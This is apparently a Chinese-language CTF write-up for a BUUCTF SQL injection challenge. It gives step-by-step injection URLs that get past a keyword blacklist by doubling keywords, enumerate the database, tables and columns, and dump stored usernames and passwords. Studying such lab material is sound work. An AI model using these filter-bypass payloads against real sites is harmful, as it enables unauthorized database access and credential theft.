注意点——在注入的时候测试过or是被过滤了的,所以之后所有的关键字涉及or的地方都会被挖掉,所以遇见or也要乱序双写 ,遇见关键字也是要乱序双写
闭合以及注释都在传参的后面完成
http://ab27899d-40b7-4e84-9fc8-c7c334c13c3a.node4.buuoj.cn:81/check.php?username=1&password=1'-- -
此时and关键字被过滤
1. 可使用like关键字代替;anandd乱序绕过——同样order by乱序也可绕过
2. 使用And发现大小写不行;&&代替and的逻辑操作符不行
3. 使用or————发现仍旧被过滤
http://ab27899d-40b7-4e84-9fc8-c7c334c13c3a.node4.buuoj.cn:81/check.php?username=1&password=1'and 1=1-- -
使用order by 查询数据表列数
http://ab27899d-40b7-4e84-9fc8-c7c334c13c3a.node4.buuoj.cn:81/check.php?username=1&password=1'oorrder bbyy 3-- -
然后联合查询————仍旧使用乱序绕过
http://ab27899d-40b7-4e84-9fc8-c7c334c13c3a.node4.buuoj.cn:81/check.php?username=1&password=1'ununionion seselectlect 1,database(),3-- -
查到数据库名为geek,然后爆表名
http://ab27899d-40b7-4e84-9fc8-c7c334c13c3a.node4.buuoj.cn:81/check.php?username=1&password=1'ununionion seselectlect 1,group_concat(table_name),3 frfromom infoorrmation_schema.tables whwhereere table_schema=database()-- -
得到表名有b4bsql和geekuser,然后爆列名
http://ab27899d-40b7-4e84-9fc8-c7c334c13c3a.node4.buuoj.cn:81/check.php?username=1&password=1'ununionion seselectlect 1,group_concat(column_name),3 frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'-- -
此时得到flag
http://ab27899d-40b7-4e84-9fc8-c7c334c13c3a.node4.buuoj.cn:81/check.php?username=1&password=1'ununionion seselectlect 1,group_concat(username,0x3a,passwoorrd),3 frfromom b4bsql-- -